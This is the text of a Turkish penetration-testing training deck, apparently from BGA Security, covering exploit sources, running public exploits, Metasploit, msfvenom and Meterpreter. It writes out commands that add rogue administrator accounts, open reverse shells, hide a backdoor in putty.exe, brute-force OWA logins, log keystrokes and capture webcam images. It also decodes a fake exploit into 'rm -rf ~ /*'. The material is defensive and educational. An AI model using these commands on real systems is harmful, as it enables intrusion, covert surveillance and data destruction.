SlideShare a Scribd company logo
1 of 236
@BGASecurity
BEYAZ ŞAPKALI HACKER EĞİTİMİ
BÖLÜMLER
IV – V – VI
- 2014-
@BGASecurity
BGA Bilgi Güvenliği A.Ş
BGA Security Hakkında
Siber güvenlik dünyasına yönelik, yenilikçi
profesyonel çözümleri ile katkıda bulunmak
amacı ile 2008 yılında kurulan BGA Bilgi
Güvenliği A.Ş. stratejik siber güvenlik
danışmanlığı ve güvenlik eğitimleri konularında
büyük ölçekli çok sayıda kuruma hizmet
vermektedir.
Gerçekleştirdiği vizyoner danışmanlık projeleri
ve nitelikli eğitimleri ile sektörde saygın bir yer
kazanan BGA Bilgi Güvenliği, kurulduğu günden
bugüne kadar alanında lider finans, enerji,
telekom ve kamu kuruluşları ile 1.000'den fazla
eğitim ve danışmanlık projelerine imza
atmıştır.
ARGE
EĞİTİM
MSSP
PENTEST
SOME / SOC
SECOPS
BGA | Hakkında
@BGASecurity
Sistemlere Sızma
Exploit Çalıştırma
BÖLÜM - IV
BGA | CEH
@BGASecurity
Sistemlere Sızma Yöntemleri
 Günümüzde açıklıklar yoğun olarak network seviyesinde iki port üzerinde
gözükmektedir (80/443)
 Uygulama seviyesi güvenlik zafiyetleri kullanılarak işletim sistemi, LAN ve DMZ
bölgeleri ele geçirilebilir.
 Gerekli önlemler alınmadığı durumlarda
 Sistemlerde açıklık bulma, açıklığı istismar etme ve sistemi ele geçirme farklı
adımlardır ve farklı alanlarda uzmanlık ister.
BGA | CEH
@BGASecurity
Exploit|Genel Kavramlar
 Exploit nedir?
 Exploit çeşitleri
 Hangi dille yazılır ?
 Exploit araştırma teknikleri
 Yazması zor mudur?
 Exploit Frameworkleri
BGA | CEH
@BGASecurity
Exploit Nedir?
 Exploit (Ingilizce to exploit - kötüye kullanmak) bir bilgisayar
programı veya bir script, bilgisayar programlarında bulunan
zayıflık veya hatalar için kullanılır.
 Vikipedia
http://en.wikipedia.org/wiki/Exploit_(computer_security)
 Teknik olarak , pentest çalışmalarında ya da siber saldırılarda
varolan bir güvenlik zafiyetini istismar ederek sisteme sızmaya
yol açacak yazılım/script.
BGA | CEH
@BGASecurity
Exploit Çeşitleri
 Farklı amaçlarla kullanılan exploit çeşitleri vardır
 Exploit çeşitlerinden bazıları
 Local Exploits
 Remote Exploits
 Dos-Exploits
 Zero-Day-Exploits
BGA | CEH
@BGASecurity
Remote Exploits
 Sistemlere sadece uzaktan erişilerek çalıştırılabilen exploit çeşidi.
 Bu exploit çeşidinde hedef sisteme ağ üzerinden bağlantının olması
yeterli olmaktadır.
 Web tabanlı ya da network tabanlı olabilir.
BGA | CEH
@BGASecurity
Remote Exploit - Heartbleed
 Uzaktan sisteme ait memory den bilgi açığa çıkarma(Memory
disclosure-Information leakage)
 Yahoo üzerinde binlerce kullanıcı kullanıcı adı ve parolası ele geçirildi.
 http://www.exploit-db.com/exploits/32745/
 Kullanımı: python heartbleed.py www.baku.ws -p 443
 Alexa kayıtlarından heartbleed açıklığı barındıran sistemler:
https://zmap.io/heartbleed/
BGA | CEH
@BGASecurity
Heartbleed Information Leakage
 En sıcak örneği OpenSSL heartbleed açıklığı
 OpenSSL üzerindeki bilgi açığa çıkarma açıklığı kullanılarak SSL akan trafikler
okunabilmiş ve kullanıcılara ait username/password , eposta vs. okunabilmiştir.
BGA | CEH
@BGASecurity
Remote Exploit – SEP Remote Code Exe
 Symantec End Point Sunucusu üzerinde uzaktan komut çalıştırmaya izin
veren bir açıklık.
 SEP sunucu işletim sistemi bazında ele geçirilebilir.
 http://www.exploit-db.com/exploits/31853/
 Kullanımı:
python sep_exploit.py -t 192.168.1.100 -c "net user bga P@ssw0rd /add"
python sep_exploit.py -t 192.168.1.100 -c "net localgroup Administrators bga
/add"
BGA | CEH
@BGASecurity
Remote exploit – F5 Big IP Auth. bypass
 SSH servisi dışarı açık olan f5 big IP load balancerlar etkilenmiştir.
 Tüm F5’lere erişim sağlanabilecek bir ssh private key keşfedilmiş ve bunla
root haklarında sisteme erişilebilmiştir.
 http://www.exploit-db.com/exploits/19091/
 Kullanımı:
root@bt:~/Desktop/pentesttool/f5 big ip# python f5.py
Enter the IP address of the F5: 5.5.5.5
root@f5:>
BGA | CEH
@BGASecurity
Local Exploits
 Sadece uzaktan erişimin yeterli olmadığı, hedef sistem üzerinde
yetkili/düşük yetkili sistem hesabı gerektiren exploit çeşidi.
 Linux kernel exploitleri bu exploit tipine en iyi örnektir.
 İstismar kodunu çalıştırabilmek için Linux sistem üzerinde komut
çalıştırabilmek gerekir.
BGA | CEH
@BGASecurity
DoS Exploits
 Çalıştırıldığında hedef sisteme erişim izni vermeyen fakat hedef sistemin
çalışamaz, erişilemez hale gelmesini sağlayan exploit çeşidi.
 Tehlike seviyesi diğerlerine göre daha düşüktür.
BGA | CEH
@BGASecurity
0 day Exploit
 Açığı bulan kişi/grup açıklığı firmaya bildirmeden exploitini yazarak
yayınlar/satar.
 Exploitten firma ile saldırganlar aynı anda haberdar olur ve bir yarış
başlar.
BGA | CEH
@BGASecurity
Exploit Araştırma Kaynakları
 Exploitler iki şekilde elde edilebilir:
 Google ve benzeri arama motorları kullanarak genele açık, yayınlanmış
exploitler bulunabilir.
 Sadece belirli kişilerin üye olabileceği underground forumlarda, IRC
odalarında ve dışa kapalı e-posta listelerinde
 Değerli exploitler genellikle genele açılmadan önce 2-3 aylık bir
satış –özel kullanım- süreci yaşarlar.
 Exploit sat-al işlemi ciddi paralar kazandıran bir ticaret biçimidir.
BGA | CEH
@BGASecurity
exploit-db.com
 En güncel ve güvenilir exploit araştırma sitesi
 Açıklığı barındıran uygulamanın güncel olmayan sürümüne erişim bilgisi de sunar.
 Web tabanlı açıklıklar için Google üzerinde arama imkanı sunar.
 Gönderilen exploitler bir kalite kontrol sürecinden geçer, fake exploitleri kabul
etmezler
BGA | CEH
@BGASecurity
Kali üzerinde exploit-db veritabanı
 Kali üzerinde /usr/share/exploitdb altında tüm exploit-db.com
exploitleri mevcuttur.
 Searchsploit aracı ile aşağıdaki gibi arama yapılabili.
searchsploit tomcat windows remote
Searchspoit kernel linux local
BGA | CEH
@BGASecurity
SecurityFocus
BGA | CEH
@BGASecurity
packetstormsecurity.com
BGA | CEH
@BGASecurity
Google Üzerinden Exploit Arama
 Bazı exploitler exploit-db ve securityfocus’da olmayabilir
 Bu tip exploit aramalarında en sağlıklı yollardan biri Google’a sormaktır
 Bind DOS açıklığı exploiti araştırması
 Internetten indirilecek her exploit güvenilir midir?
 Örnek:
BGA | CEH
@BGASecurity
Sahte Exploit Kavramı
 Ava giderken avlanma!
 Exploit vs gibi konularda yeterli bilgi sahibi olmayan meraklı “hacker”ları
kandırmak ve sistemlerini ele geçirmek amacıyla –genellikle eğlence amaçlı-
gerçekleştirilir.
 Exploit kodu (payload kısmı) genellikle hex encode edilerek verilir.
 Exploit çalıştırıldığında çalıştığı sistemi silebilir, başka sistemlere bilgi
taşıyabilir.
BGA | CEH
@BGASecurity
Sahte Exploit Örneği-I
BGA | CEH
@BGASecurity
Sahte Exploit Örneği-II
char jmpcode[] =
"x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f"
"x64x65x76x2fx6ex75x6cx6cx20x26";
?????r?m? ?-?r?f? ?~? ?/?*? ?2?>? ?/??????d?e?v?/?n?u?l?l? ?&?
"rm -rf ~ /* 2> /dev/null &"
BGA | CEH
@BGASecurity
Exploit Çalıştırma
 Script tabanlı exploitler
 Python, Perl ile yazılmış exploitler
 C/C++ dilleri ile yazılmış exploitlerin çalıştırılması
 Her exploitin çalıştırılmaıs için gerekli komut satırı parametreleri farklıdır.
 Her sistem, her sistemde yüklü olan yama seviyesine göre farklı exploit
çalıştırmak gerekebilir.
 Script tabanlı exploitlerin payloadları genellikle iki tane olur (bind TCP,
reverse TCP)
BGA | CEH
@BGASecurity
Exploit Geliştirme/Çalıştırma
 Exploit geliştirme ve çalıştırma birbirinden farklı işlemlerdir
 Exploit geliştirme ve güvenlik zafiyet bulma birbirinden farklı
uzmanlık isteyen konulardır.
 Exploit geliştirme günümüzde işletim sistemlerinin getirdiği ek
korumalar (geliştirme kütüphanelerinin de) sayesinde oldukça
zor bir hale getirilmiştir.
 Exploit çalıştırma en basit işlemdir.
 Oku, izle, kur çalıştır!
BGA | CEH
@BGASecurity
Exploit Çalıştırmanın Zararları
 Bazı exploit denemeleri hedef sistemin durmasına, servisin zedelenmesine
veya crash olmasına neden olabilir.
 Pentest çalışmalarında önce exploit lab. Ortamında denenmeli
BGA | CEH
@BGASecurity
C Tabanlı Exploitlerin Çalıştırılması
BGA | CEH
@BGASecurity
Otomatize Exploit Çalıştırma
 Neden ihtiyaç duyuldu?
 Binlerce exploit var
 Her exploit belirli bir sisteme(işletim sistemi, yazılım
versiyonu) özel yazılıyor.
 Kurulum dili bile farklı olsa exploit çalışmayabilir
 Tüm bunları aşmak için bir framework gerekir
BGA | CEH
@BGASecurity
Otomatik Exploit Çalıştırma Eksileri
 Hangi durumlarda otomatik exploit çalıştırma araçları
avantajlı/dezavantajlı olur?
 Özellikle local exploitlerde (Linux kernelini ilgilendiren) metasploit için
geliştirilmiş exploit yoktur.
 Bu durumda internet üzerinden araştırma yapılarak bulunabilir.
 Exploitin indirileceği site herhangi bir site olmamalıdır (sahte exploitlere önlem
olarak)
BGA | CEH
@BGASecurity
Jboss Jmx-console Örneği
 Metasploit Jboss exploitleri stabil değildir.
 4 uygulamadan 3’ü sağlıklı çalışmamaktadır.
BGA | CEH
@BGASecurity
Jboss Metasploit’siz Exploiti(perl)
 Local: nc –l –v –p 443
 Exploit çalıştır:
perl daytona.pl 192.168.2.10 8080 192.168.2.2 443 lnx/win
Başarılı olması durumunda netcat ile dinlenen arayüzde hedef
sisteme komut gönderilebilir duruma gelincektir.
http://www.exploit-db.com/exploits/16274/
BGA | CEH
@BGASecurity
Linux Local Root Exploiti Arama
 Linux kernel versiyonu belirleme
 Uname –a
http://rmccurdy.com/scripts/downloaded/localroot/
# uname -a
FreeBSD s-guard19 8.1-RELEASE FreeBSD 8.1-
RELEASE #0:Tue Dec 21 08:21:08 CST 2010
root@server3:/usr/obj/usr/src/sys/server3 amd64
$ uname -a
Linux bt5r2 3.2.6 #1 SMP Fri Feb 17
10:40:05 EST 2012 i686 GNU/Linux
BGA | CEH
@BGASecurity
Uygulama|FreeBSD Local Root Exploit
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl‘
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
BGA | CEH
@BGASecurity
Otomatize Exploit Araçları
 Core Impact
 Immunity Canvas
 ExploitPack
 Metasploit Framework
 W3af
 Sqlmap (Metasploit
desteğiyle)
BGA | CEH
@BGASecurity
Core Impact
BGA | CEH
@BGASecurity
Immunity Canvas
BGA | CEH
@BGASecurity
Exploitpack
BGA | CEH
@BGASecurity
Metasploit Kullanarak Sistemlere Sızma
BGA | CEH
@BGASecurity
Metasploit Framework Projesi
 Metasploit Framework projesi exploit teknikleri ile
istismarları hakkında bilgi sağlamakta.
 Oluşturduğu yapı ile güvenlik denetçilerine, IDS imza geliştirme ve istismar
araştırmaları yapan uzmanlara, hackerlara faydalı bilgiler vermekte ve exploit
geliştiricileri için bir çatı oluşturmaktadır.
 Metasploit bir toplum projesi Metasploit LLC tarafından
yönetilmekteydi.
 Rapid7 firmasına satıldıkdan sonra Pro ve Community sürümleri ile devam
etmektedir.
BGA | CEH
@BGASecurity
Metasploit Tarihçesi
 İlk olarak ağ güvenliği oyunu amaçlı geliştirilmiştir
 Sonraları perl tabanlı bir exploit geliştirme çatısı olarak kullanıma
sunuldu
 Haziran 2004 : 2.1 stable sürümü yayınlandı
 Mart 2007 3.0 stable sürümü yayınlandı
 Eski sürümlerde perl temel alınırken yeni sürümlerde tamamen
Ruby’e geçilmiş durumda
BGA | CEH
@BGASecurity
Metasploit Framework | Özellikleri
Özellikleri ;
 Community ve Pro sürümleri bulunmakta.
 800 exploits - 435 auxiliary - 134 post -246 payloads – 27 encoders - 8 nop
bulunuyor
 Çok farkli türde payload’lar kullanilabiliyor
 Meterpreter
 VNC DLL Injection
 Binary Upload
 PassiveX
BGA | CEH
@BGASecurity
Metasploit Framework | Güncelleme
 Metasploit hızla gelişen bir araçtır.
 Hergün, her saat yeni güvenlik açıkları keşfedilmekte ve bunları sömüren
kodlar yazılmaktadır.
 Yeni payload ,encoder, exploit, ve NOP hazırlandığında metasploiti update
ederek kullanabilirsiniz.
 Linux sistemlerde komut satırından “msfupdate” komutu çalıştırılarak
güncelleme yapılır.
BGA | CEH
@BGASecurity
Temel Metasploit Bileşenleri
Aux
Modülleri
Exploit
Modülleri
Payload
Post
Exploit
Modülleri
BGA | CEH
@BGASecurity
Payload Kavramı ?
 Exploit sonrasi çalışıp yetkisiz işlevi gerçeklestirecek içerik.
 Exploit çalıştırıldığında gerçekleştireceği eylemi belirten içerik.
 Reverse bağlantı mı gerçekleştirecek?
 Bir porta bind mi olacak ?
 Shell mi verecek shell mi alacak vs.
 Show payloads komutu kullanılabilir.
BGA | CEH
@BGASecurity
Üst Düzey Bazı Payloadlar
Metasploit Frameworkde kullanılan üst düzey farklı
işlevselliğe sahip payloadlar bulunmaktadır.
Bunlardan bazıları ;
 Meterpreter
 DLL Injection
 Binary Upload
 PassiveX
 Download and Exec
 Adduser
BGA | CEH
@BGASecurity
Shellcode Nedir ?
 Açıklığı istismar edilmesi ile sisteme (/bin/bash veya cmd.exe
komut gönderme) gibi eylemleri yapan exploit kodunun ilgili
bölümü.
 Exploit sonrasi çalisicak olan platforma özel binary’ler.
 Metasploit’de bulunan payload’ların farklı dillerde shellcode çıktısı
alınabilir.
BGA | CEH
@BGASecurity
Msfpayload ile Shellkod oluşturma
 Farklı dillerde shellcode oluşturulabilir.
Payloadın farklı formatlarda shellcode çıktısını alabiliriz, örneğin;
C,Perl,raw,java,js vb.
BGA | CEH
@BGASecurity
Encoder Kavramı
 Metasploit Encoder, istenilen payloadın içeriğini değiştirerek
Saldırı Tespit ve Engelleme Sistemleri (IDS/IPS), Güvenlik
Duvarları (Firewall) ve Antivirüsler tarafından tanınmasını
engeller/zorlaştırır.
 Metasploit Frameworkde 27+ encoder bulunuyor.
BGA | CEH
@BGASecurity
Nop Nedir?
“Not Operation” , bellek yeri öğrenme amaçlı bellek
dolduran bitler.
Genellikle saldırı tespit ve engelleme sistemlerini
yanıltmak için kullanılır.
BGA | CEH
@BGASecurity
Metasploit Encoder Çeşitleri
Encoder Listesi
BGA | CEH
@BGASecurity
Msfvenom ile zararlı oluşturma
 Msfvenom –l payloads // Payloadları listelemek için
 Msfvenom –l encoders //Encoderları listelemek için
 Zararlı oluşturmak için
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=443 -a
x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe > /var/www/backdoor.exe
 Bilinen bir .exe içerisine zararlı yerleştirme
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=443 -a
x86 --platform win -x /root/Desktop/putty.exe -k -e x86/shikata_ga_nai -i 3 -f exe >
/var/www/putty5.exe
BGA | CEH
@BGASecurity
Metasploit Auxiliary Modülleri
 Modüller için geliştirilmiş ek programcıklar, yardımcı araçlardır.
 Exploit öncesi bilgi toplamak, exploit sonrası hedef sistemde
ilerlemek için kullanılır.
 Metasploit’de en fazla kullanılan bileşenlerden biri Aux
modülleridir.
BGA | CEH
@BGASecurity
Metasploit AUX Modülleri
BGA | CEH
@BGASecurity
Msfconsole Öncesi
 Msfconsole komutu verilmeden önce aşağıdaki gibi postgresql ve metasploit
servisleri başlatılmalıdır.
service postgresql start
service metasploit start
 Msfconsole komutu ile metasploit konsoldan açılır.
 db_status ile veritabanı durumu görüntülenebilir.
msf > db_status
[*] postgresql connected to msf3
 Veritabanı bağlantısı yapılmışsa aşağıdaki komut çalıştırılarak rebuild edilir.
 msf > db_rebuild_cache //Aramalardaki gecikmenin kalkması için
BGA | CEH
@BGASecurity
Aktif Metasploit Kullanımı: Msfconsole
 Metasploit komut satırı aracıdır. Unix sistemlerde
metasploit dizinine geçilerek “msfconsole” komutu yazılarak
başlatılır.
 Windows sistemlerde ise web arayüzünden
“Console” seçilerek erişim kurulur.
 Msfconsole ile payloadlar, exploitler, encoderlar, NOP lar ve
auxiliary modulleri kullanılabilir.
 Metasploit komut satırı (msfconsole) açılışında metasploit
logosu gelir.
BGA | CEH
@BGASecurity
Msfconsole
msfconsole dan bir görünüm
BGA | CEH
@BGASecurity
Msfconsole | Temel Komutlar
Komut Açıklama
? Yardım menüsü
back Mevcut seçenekten bir adım geriye döner
banner Metasploit açılış bannerlarını gösterir
cd Dizin atlamak için kullanılır
color Renk seçeneklerini ayarlar
connect Uzak bir sunucuya bağlantı kurar
exit Konsoldan çıkışı sağlar
help Yardım menüsü
info Bir veya daha fazla modul hakkında bilgi verir
BGA | CEH
@BGASecurity
Msfconsole | Temel Komutlar II –tabloya alınacak
Komut Açıklama
irb İrb scripting modunu getirir
jobs Yapılan işleri gösterir ve düzenler
kill Çalışan bir görevi öldürür.
load Framework için eklenti yükler
loadpath Belirtilen yoldan istenilen modulu/exploiti yükler
makerc Başlangıçtan itibaren kullanılan komutları bir dosyaya yazar
quit Konsoldan çıkışı sağlar
route Oturumun trafik rotasını belirler
Save Etkin veriyi kayıteder, depolar
BGA | CEH
@BGASecurity
Msfconsole | Temel Komutlar
Komut Açıklama
set Ayarların konfigure edilmesinde kullanılan atama komutu
setg Genel bir değer, değişken atar
show Belirtilen modülü veya tüm modülleri listeler
sleep Verilen zaman içinde uyku moduna geç, birşey yapma
unload Framework için mevcut eklentiyi kaldırır
unset Atanan değeri kaldırır
unsetg Yapılan genel bir değeri, değişkeni kaldırır
use Modülü seçer
version Konsol uygulamasının versiyonunu gösterir
search Modül ismi veya açıklamalarda arama yapar
sessions Aktif oturumları gösterir ve oturum bilgisi verir
BGA | CEH
@BGASecurity
Msfconsole | Aux | Port Scanning
Port tarama için arka planda nmap kullanır. Port tarama
araçlarını görüntülemek için portscan araması yapılabilir.
BGA | CEH
@BGASecurity
Msfconsole | Aux. | TCP Scan
BGA | CEH
@BGASecurity
Msfconsole | Aux. | OWA Brute Force
msf > search owa
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/owa_login normal Outlook Web
App (OWA) Brute Force Utility
BGA | CEH
@BGASecurity
Msfconsole | Auxiliary | OWA Brute Force
msf auxiliary(owa_login) > set USERPASS_FILE /root/owa_test
USERPASS_FILE => /root/owa_test
msf auxiliary(owa_login) > set RPORT 443
RPORT => 443
msf auxiliary(owa_login) > set VHOST mail.HEDEF_SITE.com.tr
VHOST => mail.HEDEF_SITE.com.tr
msf auxiliary(owa_login) > run
[*] mail.HEDEF_SITE.com.tr:0 OWA – Testing version 2010
[*] mail.HEDEF_SITE.com.tr:443 OWA – Testing version 2010
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘ali’ : ‘ali’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying sam : sam
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘sam’ : ‘sam’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying user : user
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : grt
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’: ‘grt’
[*] Auxiliary module execution completed
BGA | CEH
@BGASecurity
Exploit Arama
BGA | CEH
@BGASecurity
Msfconsole | Exploit Hakkında Bilgi
 Exploit Hakkında Bilgi Almak
Exploit seçiminden önce, exploit
hakkında detaylı bilgi almak için “info”
komutu kullanılabilir. En temel
kullanımı “info exploit_adı”
şeklindedir.
BGA | CEH
@BGASecurity
Msfconsole | Exploit Seçimi
 Exploit Seçimi
Herhangi bir arama kriterleri yoksa, kullanılabilir exploit’lerin
tamamını görüntülemek için “show exploits” komutu
kullanılabilir.
 Exploit seçimi, “use” komutu ile yapılmaktadır.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
BGA | CEH
@BGASecurity
Msfconsole | Exploit Seçimi
 Exploit seçimi yapıldıkdan sonra, exploit için işlem menüsü ile
karşılacaksınız.Exploit komutlarını listelemek için yardım komutunu
(help) kullanabiliriz. Exploit Komutları ve açıklamaları aşağıdaki gibidir;
Komut Açıklama
---------- -----------
Check Exploit öncesi güvenlik açığının kontrolü yapar.
exploit Exploiti tetikler.
pry Seçili modül için pry oturumu başlatır.
rcheck Hedef sistemin zayıflığını tekrar kontrol eder
reload Yalnızca module yükler
rexploit Exploiti tekrar çalıştırır.
BGA | CEH
@BGASecurity
Msfconsole | Exploit Seçimi
 Exploit seçimi yapıldıkdan sonra, exploit için işlem menüsü ile
karşılacaksınız.Exploit komutlarını listelemek için yardım komutunu
(help) kullanabiliriz. Exploit Komutları ve açıklamaları aşağıdaki gibidir;
Komut Açıklama
---------- -----------
Check Exploit öncesi güvenlik açığının kontrolü yapar.
exploit Exploiti tetikler.
pry Seçili modül için pry oturumu başlatır.
rcheck Hedef sistemin zayıflığını tekrar kontrol eder
reload Yalnızca module yükler
rexploit Exploiti tekrar çalıştırır.
BGA | CEH
@BGASecurity
Msfconsole | Payload Seçimi
 Payload Seçimi
Geçerli exploit için kullanılabilir payload’ları listelemek için,
“show payloads” komutu kullanılır.
BGA | CEH
@BGASecurity
Msfconsole | Payload Seçimi
“info” komutu ile seçilen payload için gerekli seçenekler ve
varsayılan
olarak atanan değerler listelenir.
Payload seçimi için “set PAYLOAD payload_adı” komutu kullanılır.
Örnekte kullandığımız VNC Inject payloadı için bu komut
“set PAYLOAD windows/vncinject/reverse_tcp” şeklinde
olucaktır.
BGA | CEH
@BGASecurity
Msfconsole | Seçenekler
 Seçeneklerin Ayarlanması
Exploit ve payload seçiminden sonra, uygulanacak hedef ve gerekli
seçenekler belirtilmelidir.
 Exploit ve Payload seçeneklerini “show options” komutu ile
görüntüleyebiliriz.
BGA | CEH
@BGASecurity
Msfconsole | Seçenekler
BGA | CEH
@BGASecurity
Msfconsole | Seçenekler
Required sütununda “yes” ile belirtilen seçeneklerin mutlaka
belirtilmesi gerekir.
Bu ayarlar şöyle yapılır ;
 RHOST = hostname veya ip adresi yazılabilir
 LHOST = saldırıyı yapan sistemin ip adresi.
 LPORT = Hedef ile iletişim kurulacağı yerel port.
Firewall , IDS/IPSleri atlatmak için 443. portu kullanmanız önerilir.
LPORT ile belirteceğiniz portun sisteminizde açık ve filtrelenmemiş
olması gerekir.
BGA | CEH
@BGASecurity
Msfconsole | Exploit Sonrası
Exploitin sonrası VNC ekran görüntüsü
BGA | CEH
@BGASecurity
Msfpayload
 Msfpayload aracı, metesploitde kullanılan payloadları derlemek
için kullanılır.
 Exploit geliştiricileri exploit yazarken, payloadlarada ihtiyaç
duyarlar bu noktada msfpayload exploit geliştiricileri için
bulunmaz nimettir.
 Metasploit’in msfpayload aracı sayesinde istenilen payloadın
çıktısı C , Perl, Ruby, Raw, Javascript, VBA ve exe olarak alınabilir.
BGA | CEH
@BGASecurity
Msfpayload
msfpayload -h parametresi ile temel kullanımını,
seçeneklerini ve payloadları görebilirsiniz.
Kullanımı:
BGA | CEH
@BGASecurity
Msfpayload
Payload Seçeneklerini Görüntülemek
BGA | CEH
@BGASecurity
Msfpayload
Seçenekler listesinde “Required”bölümündeki alanlar
mutlaka doldurulmalıdır. Bazı seçenekler varsayılan
olarak tanımlı gelmektedir.
BGA | CEH
@BGASecurity
Msfpayload
 Seçenekleri Belirlemek
Payload seçeneklerini belirlemek oldukça basittir,
aşağıdaki örnekde olduğu gibi söz dizimi kullanarak
ayarlar belirlenebilir.
BGA | CEH
@BGASecurity
Msfpayload
 Farklı dillerde shellcode oluşturulabilir.
Payloadın farklı formatlarda shellcode çıktısını alabiliriz, örneğin;
C,Perl,raw,java,js vb.
BGA | CEH
@BGASecurity
Msfpayload
Payload Derlemek
Windows sistemlerde çalışacak şekilde çalıştırılabilir, exe
dosyası oluşturalım.
msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 X
> backdoor.exe
BGA | CEH
@BGASecurity
Meterpreter
 Meterpreter , Meta-Interpreter ‘in kısaltılmışıdır.
 Modül destekli üst düzey bir payload’tır.
 Açık kaynak kodlu kolayca geliştirilebilir, kendi eklentilerinizi
geliştirmenize izin verir ve DLL olarak yeni modüller eklenebilir.
 Meterpreterin çalıştığı sistemlerde anti-virüs yazılımları,
nids tarzı yazılımlardan korunmak için içerik dahili
kriptolama özelliği mevcuttur.
BGA | CEH
@BGASecurity
Meterpreter
MSF 3.x ile birlikte yeni gelen ; Süreç birleştirme, IRB script desteği ,Timestomp
ve SAM HashDump özellikleri mevcut.Meterpreter yeni bir alt süreç olarak
doğrudan bellekte çalışıyor bu sayede hacking sonrası kurban bilgisayarda iz
bırakmaz ve adli delil toplamada saldırıya dair iz bulunması zorlaşır.
Meterpreter de esnekliği ve kullanım kolaylığı olan bir dizi komut ve eklenti
bulunuyor.
BGA | CEH
@BGASecurity
Meterpreter
Varsayılan Meterpreter Komutları ;
Komut Açıklama
use Bir veya daha fazla eklenti yüklemek için kullanılır
loadlib İstismar sürecinde yeni bir kütüphane yüklenebilir
read Uzak sistemden veri okur
write Uzak sisteme geçerli kanal üzerinden veri yazar
close Kanalı kapatır.
interact Kanalda interaktif bir oturum başlatır
initcrypt İstemci ve sunucu arasındaki iletişim için bir keyfi şifreleme algoritması
oluşturur.
BGA | CEH
@BGASecurity
Meterpreter | Ağ Komutları
Ağ Komutları
Komut Açıklama
ipconfig Ağ ayarlarlarını görüntüler
portfwd Yerel portu uzak bir servise yönlendirir
route Yönlendirme tablosunu görüntüler ve değiştirir
BGA | CEH
@BGASecurity
Meterpreter | Sistem Komutları
Sistem Komutları
Komut Açıklama
clearev Olay loglarını temizle
drop_token Herhangi bir etkin kimliğe bürünme belirteci bırakır.
execute Komut çalıştırır
getpid Geçerli proses tanımlayıcısını göster.
getprivs Yetki yükseltme komutlarını göster
getuid Sunucuda çalışan kullanıcıyı göster
kill Bir prosesi öldür
ps Çalışan prosesleri listele
BGA | CEH
@BGASecurity
Meterpreter | Sistem Komutları II
Sistem Komutları
Komut Açıklama
reboot Uzak bilgisayarı yeniden başlatır
reg Uzak bilgisayarın registery ayarlarını değiştir.
rev2self Uzak bilgisayar üzerinde RevertToSelf() arar
shell Sistem komut satırına geç
shutdown Uzak sistemi kapat
steal_token Hedef sistemde proses yetkilerine geçiş yapar
sysinfo Uzak sistem hakkında detaylı bilgi alır
BGA | CEH
@BGASecurity
Meterpreter | Kullanıcı Arayüzü Komutları
Kullanıcı Arayüzü Komutları
Komut Açıklama
enumdesktops Erişilebilir tüm masaüstlerini göster
getdesktop Geçerli meterpreter masaüstünü göster
idletime Boş vakti gösterir
keyscan_dump Klavye girişlerini kayıt eder
keyscan_start Klavye girişlerini dinlemeye başla
keyscan_stop Klavye girişlerini dinlemeyi durdur
screenshot Masaüstünün ekran görüntüsünü al
setdesktop Meterpreter geçerli masaüstünü değiştir.
uictl Bazı kullanıcı arabirimi bileşenlerini denetler
BGA | CEH
@BGASecurity
Meterpreter | Yetki Yükseltme Komutları
Priv: Yetki Yükseltme Komutları
Komut Açıklama
getsystem Yerel yetki yükseltme tekniklerini uygula
BGA | CEH
@BGASecurity
Meterpreter uygulamaları
 getsystem ile system haklarına geçiş yapılır.
 Execute komutu ile uzak sunucuda komut koşturulabilir.
Execute –f cmd.exe –i –H
 sysinfo ile hedef işletim sistemi hakkında bilgi alınabilir.
 getuid ile hangi yetkiler ile komut koşturduğumuzu görebiliriz.
 shell komutu ile doğrudan işletim sistemi shell alınabilir.
 clearev komutu ile event logları silinebilir.
BGA | CEH
@BGASecurity
Meterpreter uygulamaları - II
 Hedef sistemden screenshot almak için(-q resim kalite değeri);
screenshot –p /root/Desktop/test.jpg –q 60
 Ortam ses kaydı almak için;
record_mic -d 60 -f /root/Desktop/ses.wav
 webcam_list ile hedef sistemdeki kameraları görebiliriz.
 Webcam üzerinden screenshot alma(-v bittiginde oto. açılmasn)
webcam_snap -p /root/kamera.jpg -q 60 -v false
BGA | CEH
@BGASecurity
Meterpreter Uygulamaları - III
 pwd uzak sistem üzerindeki path bilgisini verir.
 lpwd local sistemimizde çalıştığımız dizini görebiliriz.
 cd D: komutu ile başka bir partiation geçilebilir.
 lcd /root komutu ile localde başka bir dizine geçilir.
 run keylogrecorder ile hedef sistemde keyloger çalıştırılır. Veya keyscan_start
denildekten sonra keyscan_dump ile klavye çıktıları elde edilebilir. Sonlandırmak için
keyscan_stop kullanılır.
 run winenum ile sistem üzerinde bir çok komut çalıştırılarak sistem hakkında detaylı
bilgiler elde edilebilir.
 meterpreter > run arp_scanner -r 172.16.16.1-254 // Diğer subnetler taranabilir.
BGA | CEH
@BGASecurity
Msfencode
Msfencode, istenilen payloadın içeriğini değiştirerek Kaçak Giriş
Tespit
